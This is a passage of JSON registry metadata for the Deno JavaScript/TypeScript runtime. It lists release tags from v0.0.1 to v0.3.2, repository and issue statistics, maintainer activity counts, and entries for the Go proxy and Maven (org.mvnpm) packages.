","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-23T02:05:41.528Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":1,"rankings":{"downloads":null,"dependent_repos_count":4.716716996980181,"dependent_packages_count":9.552826830390176,"stargazers_count":0.005799652020878747,"forks_count":0.05449673019618823,"docker_downloads_count":null,"average":3.582460052396856},"purl":"pkg:golang/github.com/denoland/deno","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/go/github.com/denoland/deno","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/go/github.com/denoland/deno","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/go/github.com/denoland/deno/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T15:36:05.774Z","issues_count":6593,"pull_requests_count":9606,"avg_time_to_close_issue":17240482.91906903,"avg_time_to_close_pull_request":1537756.603103103,"issues_closed_count":3779,"pull_requests_closed_count":7991,"pull_request_authors_count":571,"issue_authors_count":2462,"avg_comments_per_issue":2.5116032155316246,"avg_comments_per_pull_request":0.7158026233603998,"merged_pull_requests_count":6976,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":659,"past_year_pull_requests_count":1189,"past_year_avg_time_to_close_issue":1375932.5787037036,"past_year_avg_time_to_close_pull_request":1325136.485893417,"past_year_issues_closed_count":216,"past_year_pull_requests_closed_count":638,"past_year_pull_request_authors_count":177,"past_year_issue_authors_count":370,"past_year_avg_comments_per_issue":1.2109256449165402,"past_year_avg_comments_per_pull_request":1.07905803195963,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":468,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1779,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":673,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":377,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fdenoland%2Fdeno/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fdenoland%2Fdeno/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fdenoland%2Fdeno/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fdenoland%2Fdeno/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fdenoland%2Fdeno/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fdenoland%2Fdeno/codemeta","maintainers":[],"registry":{"name":"proxy.golang.org","url":"https://proxy.golang.org","ecosystem":"go","default":true,"packages_count":2282188,"maintainers_count":0,"namespaces_count":839573,"keywords_count":126245,"github":"golang","metadata":{"funded_packages_count":69842,"sync_missing_packages_cursor":{"timestamp":"2026-08-17T00:00:58.969562Z","path":"github.com/Tektoncd/operator","version":"v0.78.0"},"rate_limit":1},"icon_url":"https://github.com/golang.png","created_at":"2022-04-04T15:19:22.939Z","updated_at":"2026-09-01T05:03:01.892Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/namespaces"}},{"id":14146248,"name":"org.mvnpm:deno","ecosystem":"maven","description":"A modern runtime for JavaScript and TypeScript.","homepage":"https://deno.com","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":"org.mvnpm","versions_count":18,"first_release_published_at":"2025-12-18T13:56:52.000Z","latest_release_published_at":"2026-08-29T02:11:53.000Z","latest_release_number":"2.9.6","last_synced_at":"2026-08-29T21:56:52.356Z","created_at":"2026-03-29T12:07:55.025Z","updated_at":"2026-08-29T21:56:52.356Z","registry_url":"https://central.sonatype.com/artifact/org.mvnpm/deno/","install_command":null,"documentation_url":"https://appdoc.app/artifact/org.mvnpm/deno/","metadata":{},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecar